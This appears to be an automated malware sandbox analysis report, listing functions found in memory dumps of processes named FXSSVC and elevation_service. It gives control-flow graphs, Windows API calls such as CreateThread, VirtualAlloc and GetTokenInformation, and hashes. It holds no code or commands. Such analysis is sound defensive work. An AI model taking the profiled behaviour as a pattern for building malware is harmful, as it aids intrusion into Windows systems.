                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8e8822890c5d4b1c45b6205c3b8f8dbdc7eb0a6f41f21fcb66711f4e26bc840a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0817450FAB1CBCA268718B06043AEBB0AFB1718B6D05AAD486CB157CE15DC01F376
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D283E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 605 d283e7-d283e9 606 d282c5-d282c8 605->606 607 d283ef 605->607 609 d283f9 606->609 610 d282ce 606->610 607->606 608 d283f5-d283f7 607->608 608->609 613 d282d2-d282d7 609->613 614 d283ff 609->614 611 d282d0 610->611 612 d2828f-d28303 call d572ec 610->612 611->612 611->613 616 d28306-d28309 612->616 630 d2834f-d28355 612->630 613->616 617 d2f524-d2f52e 614->617 618 d2830b-d28311 CloseHandle 616->618 619 d2832e-d28330 616->619 620 d2f807 617->620 618->619 623 d28332 619->623 624 d282dd-d282e3 619->624 625 d2f8df-d2f8e0 620->625 626 d2f80d 620->626 623->624 627 d28334 623->627 628 d283a3-d283a4 624->628 629 d282e9 624->629 633 d315a5-d315aa 625->633 626->625 631 d2f813 626->631 627->617 629->628 634 d282ef 629->634 637 d28212-d2821a GetTokenInformation 630->637 638 d28341 630->638 639 d2f81b 631->639 640 d2f78f 631->640 636 d315ae-d315af 633->636 646 d282f0-d2831c 634->646 643 d315b2-d315b7 636->643 641 d28220-d28234 637->641 642 d283af 637->642 638->637 644 d28347 638->644 639->625 640->639 645 d2f795 640->645 669 d283d7-d283dd 641->669 670 d2823a 641->670 648 d28251-d28256 call d572f4 642->648 649 d283b5 642->649 650 d315ba-d315c1 643->650 651 d31638-d31640 644->651 652 d2834d 644->652 645->620 671 d28322 646->671 672 d281e5 646->672 668 d2825b-d28260 648->668 649->648 656 d283bb-d283ca 649->656 657 d31750-d317a2 call d572f4 650->657 658 d315c7-d315d2 650->658 654 d31646-d3165f 651->654 655 d3170e-d31727 651->655 652->630 654->658 663 d31665 654->663 655->658 662 d3172d 655->662 702 d283d0 656->702 703 d28277-d2827a 656->703 666 d31620-d31623 658->666 667 d315d4-d315d6 658->667 662->657 663->657 677 d316a0-d316b4 666->677 678 d31625-d31628 666->678 674 d31670-d31684 667->674 675 d315dc-d315df 667->675 676 d28390-d28393 668->676 670->669 682 d28240 670->682 671->672 683 d28328-d2832c 671->683 680 d282a3-d282a5 672->680 681 d281eb 672->681 674->633 684 d3168a-d3168d 674->684 675->650 690 d315e1-d315f6 675->690 685 d28399 676->685 686 d2827e 676->686 688 d316b6-d316b9 677->688 689 d316f4-d316f5 677->689 678->650 679 d3162a-d31636 678->679 679->651 698 d316dc-d316ec 679->698 680->609 699 d282ab 680->699 691 d282b2-d2836f GetTokenInformation 681->691 692 d281f1 681->692 693 d3b32e-d3b330 682->693 683->606 683->619 700 d31693-d31697 684->700 701 d3172f-d31738 684->701 685->686 694 d2839f-d283a1 685->694 686->618 695 d28284 686->695 704 d316bb 688->704 705 d3173a-d3173b 688->705 707 d316fe-d3170c 689->707 696 d316d2-d316d7 690->696 697 d315fc-d31600 690->697 722 d28376-d2837b 691->722 692->691 708 d281f7 692->708 712 d3b332-d3b337 call d572f4 693->712 713 d3b300 693->713 694->628 695->619 696->636 697->707 714 d31606-d31618 697->714 698->658 719 d316f2 698->719 699->609 715 d282b1 699->715 717 d316bf-d316cd 700->717 709 d3173f-d31740 701->709 702->703 718 d283d6 702->718 710 d28241 703->710 711 d2827c 703->711 704->717 705->709 720 d31744-d31748 707->720 721 d2828e 708->721 709->720 710->648 710->722 711->686 711->710 712->713 732 d3b339 712->732 725 d3b302 713->725 726 d3b2fd 713->726 714->643 715->691 718->669 719->657 721->612 722->646 727 d28381 722->727 729 d3b305 726->729 730 d3b2ff 726->730 727->646 731 d28387 727->731 733 d3b308-d3b315 729->733 734 d3b322-d3b32d 729->734 730->733 731->676 731->703 732->713 735 d3b33b-d3b33f 732->735 733->729 737 d3b317 733->737 734->693 735->733 737->726
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60fd48a5f0fd0d8f9550dd6931ff5781ab469a0007d06b5cb8426c1fb241f1ad
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF06D7450BA71CB8625C718B44053AE7B0AF7170CB6C0969C486CB522CE25EC01F77A
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D28318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 474 d28318-d2831c 475 d28322 474->475 476 d281e5 474->476 475->476 479 d28328-d2832c 475->479 477 d282a3-d282a5 476->477 478 d281eb 476->478 480 d282ab 477->480 481 d283f9 477->481 482 d282b2-d2836f GetTokenInformation 478->482 483 d281f1 478->483 484 d282c5-d282c8 479->484 485 d2832e-d28330 479->485 480->481 486 d282b1 480->486 492 d282d2-d282d7 481->492 493 d283ff 481->493 505 d28376-d2837b 482->505 483->482 489 d281f7-d2828e 483->489 484->481 491 d282ce 484->491 487 d28332 485->487 488 d282dd-d282e3 485->488 486->482 487->488 494 d28334 487->494 498 d283a3-d283a4 488->498 499 d282e9 488->499 497 d2828f-d28303 call d572ec 489->497 496 d282d0 491->496 491->497 500 d28306-d28309 492->500 501 d2f524-d2f52e 493->501 494->501 496->492 496->497 497->500 518 d2834f-d28355 497->518 499->498 504 d282ef 499->504 500->485 502 d2830b-d28311 CloseHandle 500->502 503 d2f807 501->503 502->485 509 d2f8df-d2f8e0 503->509 510 d2f80d 503->510 507 d282f0-d2831c 504->507 505->507 508 d28381 505->508 507->475 507->476 508->507 514 d28387 508->514 517 d315a5-d315aa 509->517 510->509 515 d2f813 510->515 519 d28390-d28393 514->519 520 d28277-d2827a 514->520 527 d2f81b 515->527 528 d2f78f 515->528 522 d315ae-d315af 517->522 532 d28212-d2821a GetTokenInformation 518->532 533 d28341 518->533 523 d28399 519->523 524 d2827e 519->524 525 d28241 520->525 526 d2827c 520->526 530 d315b2-d315b7 522->530 523->524 531 d2839f-d283a1 523->531 524->502 535 d28284 524->535 525->505 534 d28251-d28260 call d572f4 525->534 526->524 526->525 527->509 528->527 536 d2f795 528->536 539 d315ba-d315c1 530->539 531->498 537 d28220-d28234 532->537 538 d283af 532->538 533->532 540 d28347 533->540 534->519 535->485 536->503 565 d283d7-d283dd 537->565 566 d2823a 537->566 538->534 543 d283b5 538->543 544 d31750-d317a2 call d572f4 539->544 545 d315c7-d315d2 539->545 546 d31638-d31640 540->546 547 d2834d 540->547 543->534 551 d283bb-d283ca 543->551 553 d31620-d31623 545->553 554 d315d4-d315d6 545->554 549 d31646-d3165f 546->549 550 d3170e-d31727 546->550 547->518 549->545 557 d31665 549->557 550->545 556 d3172d 550->556 551->520 584 d283d0 551->584 562 d316a0-d316b4 553->562 563 d31625-d31628 553->563 560 d31670-d31684 554->560 561 d315dc-d315df 554->561 556->544 557->544 560->517 567 d3168a-d3168d 560->567 561->539 570 d315e1-d315f6 561->570 568 d316b6-d316b9 562->568 569 d316f4-d316f5 562->569 563->539 564 d3162a-d31636 563->564 564->546 571 d316dc-d316ec 564->571 566->565 572 d28240 566->572 573 d31693-d31697 567->573 574 d3172f-d31738 567->574 576 d316bb 568->576 577 d3173a-d3173b 568->577 580 d316fe-d3170c 569->580 578 d316d2-d316d7 570->578 579 d315fc-d31600 570->579 571->545 586 d316f2 571->586 582 d3b32e-d3b330 572->582 583 d316bf-d316cd 573->583 581 d3173f-d31740 574->581 576->583 577->581 578->522 579->580 587 d31606-d31618 579->587 588 d31744-d31748 580->588 581->588 590 d3b332-d3b337 call d572f4 582->590 591 d3b300 582->591 584->520 589 d283d6 584->589 586->544 587->530 589->565 590->591 599 d3b339 590->599 594 d3b302 591->594 595 d3b2fd 591->595 597 d3b305 595->597 598 d3b2ff 595->598 600 d3b308-d3b315 597->600 601 d3b322-d3b32d 597->601 598->600 599->591 602 d3b33b-d3b33f 599->602 600->597 604 d3b317 600->604 601->582 602->600 604->595
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 00D2830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00D28369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 96d9b61233d8a89f60e30d54642cef3dcf6020ef150cae75ff331c0a9eb72424
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF06D7440B671CBCA258B18F44053AE7B0AE7175CB6C0969C486CB162CE25EC02F776

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:66
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                                                                                                                                                                    execution_graph 3862 995b8f 3873 9a53f0 3862->3873 3864 995baf 3878 9981c0 3864->3878 3866 995c2c 3867 995c84 3885 995990 3867->3885 3869 995dcd 3869->3869 3870 995d56 CreateThread 3872 995bbc 3870->3872 3871 995cd4 CreateThread CloseHandle 3871->3872 3872->3866 3872->3867 3872->3870 3872->3871 3874 9a53f4 3873->3874 3875 9a545e VirtualAlloc 3874->3875 3877 9a53f6 3874->3877 3876 9a5460 3875->3876 3876->3874 3877->3864 3880 9981e5 3878->3880 3879 99830b CloseHandle 3879->3880 3880->3879 3881 998334 3880->3881 3882 998357 GetTokenInformation 3880->3882 3883 998212 GetTokenInformation 3880->3883 3881->3872 3882->3880 3883->3880 3884 998220 3883->3884 3884->3872 3887 995994 wcscpy 3885->3887 3886 995a23 3886->3869 3887->3886 3888 995a8d VirtualAlloc 3887->3888 3888->3887 3911 9958de 3912 9a53f0 VirtualAlloc 3911->3912 3913 9958f9 3912->3913 3914 9981c0 3 API calls 3913->3914 3915 995907 3914->3915 3937 998201 3939 998220 3937->3939 3941 9981e5 3937->3941 3938 99830b CloseHandle 3938->3941 3940 998334 3941->3938 3941->3940 3942 998357 GetTokenInformation 3941->3942 3943 998212 GetTokenInformation 3941->3943 3942->3941 3943->3939 3943->3941 3889 995d50 CreateThread 3890 995bbc 3889->3890 3891 995cd4 CreateThread CloseHandle 3890->3891 3892 995c84 3890->3892 3893 995c2c 3890->3893 3896 995d56 CreateThread 3890->3896 3891->3890 3894 995990 VirtualAlloc 3892->3894 3895 995dcd 3894->3895 3895->3895 3896->3890 3916 9981e3 3920 9981e5 3916->3920 3917 998357 GetTokenInformation 3917->3920 3918 99830b CloseHandle 3918->3920 3919 998334 3920->3917 3920->3918 3920->3919 3921 998212 GetTokenInformation 3920->3921 3921->3920 3922 998220 3921->3922 3944 995d22 3945 995cd4 CreateThread CloseHandle 3944->3945 3948 995bbc 3944->3948 3945->3948 3946 995c2c 3947 995d56 CreateThread 3947->3948 3948->3945 3948->3946 3948->3947 3949 995c84 3948->3949 3950 995990 VirtualAlloc 3949->3950 3951 995dcd 3950->3951 3951->3951 3897 9983e7 3900 9981e5 3897->3900 3898 99830b CloseHandle 3898->3900 3899 998212 GetTokenInformation 3899->3900 3903 998220 3899->3903 3900->3898 3900->3899 3901 998357 GetTokenInformation 3900->3901 3902 998334 3900->3902 3901->3900

                                                                                                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                    Function 009981C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 0 9981c0-9981d8 1 9983bf-9983ca 0->1 3 9983d0 1->3 4 998277-99827a 1->4 3->4 7 9983d6 3->7 5 99827c 4->5 6 998241 4->6 5->6 10 99827e 5->10 8 998251-998256 call 9c72f4 6->8 9 998376-99837b 6->9 18 99825b-998260 8->18 11 998381 9->11 12 9982f0-99831c 9->12 14 99830b-998311 CloseHandle 10->14 15 998284 10->15 11->12 17 998387 11->17 31 998322 12->31 32 9981e5 12->32 19 99832e-998330 14->19 15->19 17->4 20 998390-998393 17->20 18->20 21 9982dd-9982e3 19->21 22 998332 19->22 20->10 23 998399 20->23 24 9982e9 21->24 25 9983a3-9983a4 21->25 22->21 27 998334 22->27 23->10 29 99839f-9983a1 23->29 24->25 30 9982ef 24->30 28 99f524-99f52e 27->28 33 99f807 28->33 29->25 30->12 31->32 36 998328-99832c 31->36 34 9981eb 32->34 35 9982a3-9982a5 32->35 37 99f80d 33->37 38 99f8df-99f8e0 33->38 41 9981f1 34->41 42 9982b2-99836f GetTokenInformation 34->42 39 9983f9 35->39 40 9982ab 35->40 36->19 43 9982c5-9982c8 36->43 37->38 46 99f813 37->46 53 9a15a5-9a15aa 38->53 44 9983ff 39->44 45 9982d2-9982d7 39->45 40->39 47 9982b1 40->47 41->42 48 9981f7 41->48 42->9 43->39 50 9982ce 43->50 44->28 54 998306-998309 45->54 57 99f81b 46->57 58 99f78f 46->58 47->42 56 99828e 48->56 51 99828f-998303 call 9c72ec 50->51 52 9982d0 50->52 51->54 66 99834f-998355 51->66 52->45 52->51 60 9a15ae-9a15af 53->60 54->14 54->19 56->51 57->38 58->57 61 99f795 58->61 63 9a15b2-9a15b7 60->63 61->33 65 9a15ba-9a15c1 63->65 67 9a1750-9a17a2 call 9c72f4 65->67 68 9a15c7-9a15d2 65->68 73 998341 66->73 74 998212-99821a GetTokenInformation 66->74 71 9a1620-9a1623 68->71 72 9a15d4-9a15d6 68->72 75 9a16a0-9a16b4 71->75 76 9a1625-9a1628 71->76 78 9a15dc-9a15df 72->78 79 9a1670-9a1684 72->79 73->74 80 998347 73->80 85 9983af 74->85 86 998220-998234 74->86 83 9a16b6-9a16b9 75->83 84 9a16f4-9a16f5 75->84 76->65 81 9a162a-9a1636 76->81 78->65 87 9a15e1-9a15f6 78->87 79->53 82 9a168a-9a168d 79->82 91 9a1638-9a1640 80->91 92 99834d 80->92 81->91 93 9a16dc-9a16ec 81->93 95 9a172f-9a1738 82->95 96 9a1693-9a1697 82->96 97 9a173a-9a173b 83->97 98 9a16bb 83->98 99 9a16fe-9a170c 84->99 85->8 94 9983b5 85->94 111 99823a 86->111 112 9983d7-9983dd 86->112 89 9a15fc-9a1600 87->89 90 9a16d2-9a16d7 87->90 89->99 100 9a1606-9a1618 89->100 90->60 102 9a170e-9a1727 91->102 103 9a1646-9a165f 91->103 92->66 93->68 101 9a16f2 93->101 94->8 105 9983bb-9983bd 94->105 104 9a173f-9a1740 95->104 106 9a16bf-9a16cd 96->106 97->104 98->106 108 9a1744-9a1748 99->108 100->63 101->67 102->68 109 9a172d 102->109 103->68 110 9a1665 103->110 104->108 105->1 109->67 110->67 111->112 113 998240 111->113 115 9ab32e-9ab330 113->115 116 9ab332-9ab337 call 9c72f4 115->116 117 9ab300 115->117 116->117 125 9ab339 116->125 121 9ab2fd 117->121 122 9ab302 117->122 123 9ab2ff 121->123 124 9ab305 121->124 126 9ab308-9ab315 123->126 124->126 127 9ab322-9ab32d 124->127 125->117 128 9ab33b-9ab33f 125->128 126->124 130 9ab317 126->130 127->115 128->126 130->121
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 39baefc33e140fcb93515faf968af9d8390162026be8828d2141562e5b2cc3d3
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4B1263050DE458BDF29CB1D848123AB7A9FF97354F288A5DD4ABC7166DE28DC42C392
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00995B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 131 995b8f-995c20 call 9a53f0 call 9c8358 call 9b0320 call 9981c0 141 995cf4-995d08 call 9c72ec 131->141 142 995c26 131->142 146 995d0e 141->146 147 995c87-995dc8 call 995e60 call 995990 141->147 142->141 144 995c2c-995c2f 142->144 146->147 149 995d14-995d18 146->149 159 995dcd 147->159 152 995daf-995db6 call 9952d0 149->152 153 995c65 149->153 165 995dbc 152->165 166 995c30-995c39 152->166 156 995ca3 call 995df0 153->156 157 995c67 153->157 168 995c45-995d6d call 9b1520 156->168 157->156 161 995c69-995c9d 157->161 159->159 177 995c9f 161->177 178 995c85 161->178 169 995d7d-995d89 165->169 170 995dbe 165->170 180 995cb9-995cbd 166->180 181 995bf7 166->181 188 995bfd-995c06 168->188 193 995d73 168->193 182 995d8b-995d92 169->182 183 995d94 169->183 170->169 176 995d9b 170->176 184 995d9c 176->184 177->178 186 995ca1 177->186 178->147 189 995cc3 180->189 190 995d56-995d5b CreateThread 180->190 181->180 181->188 182->183 182->184 183->144 191 995cb3 183->191 195 995da5-995da8 184->195 186->156 188->195 189->190 194 995cc9 189->194 197 995d1f-995d45 190->197 198 995c7e 190->198 191->144 191->180 193->188 199 995d79-995d7b 193->199 194->190 195->152 202 995cd4-995cea CreateThread CloseHandle 197->202 203 995d47 197->203 198->197 200 995c84 198->200 199->169 200->178 202->182 205 995cf0-995d4d 202->205 203->202 205->183
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: acc9c409bfed6f971381e37a24b597da9492e4a9f0360d1c688dd96e81bdce6a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47411920608F098FDF6BAB2C945D33B36D8EB95311F5B096AD44BCB1E5FE288C458752
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00995D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 207 995d22-995d45 208 995cd4-995cea CreateThread CloseHandle 207->208 209 995d47 207->209 211 995d8b-995d92 208->211 212 995cf0-995d4d 208->212 209->208 213 995d9c 211->213 214 995d94 211->214 212->214 217 995da5-995db6 call 9952d0 213->217 218 995c2c-995c2f 214->218 219 995cb3 214->219 230 995dbc 217->230 231 995c30-995c39 217->231 219->218 220 995cb9-995cbd 219->220 222 995cc3 220->222 223 995d56-995d5b CreateThread 220->223 222->223 226 995cc9 222->226 228 995d1f-995d45 223->228 229 995c7e 223->229 226->223 228->208 228->209 229->228 232 995c84-995dc8 call 995e60 call 995990 229->232 235 995d7d-995d89 230->235 236 995dbe 230->236 231->220 242 995bf7 231->242 250 995dcd 232->250 235->211 235->214 236->235 241 995d9b 236->241 241->213 242->220 245 995bfd-995c06 242->245 245->217 250->250
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e56561c007d774261732b7bccef2e4da0144bf46c666fb8970ae97739386d307
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93F0F02061CE0586DF2F9B3C985933B62C9A799332F670F1ED097C90E4FA2889029309
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00995D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 251 995d50-995d5b CreateThread 252 995c78 251->252 253 995d1f-995d45 252->253 254 995c7e 252->254 257 995cd4-995cea CreateThread CloseHandle 253->257 258 995d47 253->258 254->253 255 995c84-995dc8 call 995e60 call 995990 254->255 276 995dcd 255->276 261 995d8b-995d92 257->261 262 995cf0-995d4d 257->262 258->257 264 995d9c 261->264 265 995d94 261->265 262->265 270 995da5-995db6 call 9952d0 264->270 271 995c2c-995c2f 265->271 272 995cb3 265->272 283 995dbc 270->283 284 995c30-995c39 270->284 272->271 275 995cb9-995cbd 272->275 278 995cc3 275->278 279 995d56-995d5b CreateThread 275->279 276->276 278->279 281 995cc9 278->281 279->252 281->279 286 995d7d-995d89 283->286 287 995dbe 283->287 284->275 292 995bf7 284->292 286->261 286->265 287->286 291 995d9b 287->291 291->264 292->275 293 995bfd-995c06 292->293 293->270
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 42431177af9be29fe9dc5de00db3a3f2557320f6d74cc522e1d840be51bc5390
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B01200028F86874C2F1F3C044812B098C2E46A359771F6C9FB7968E2E8042C446330
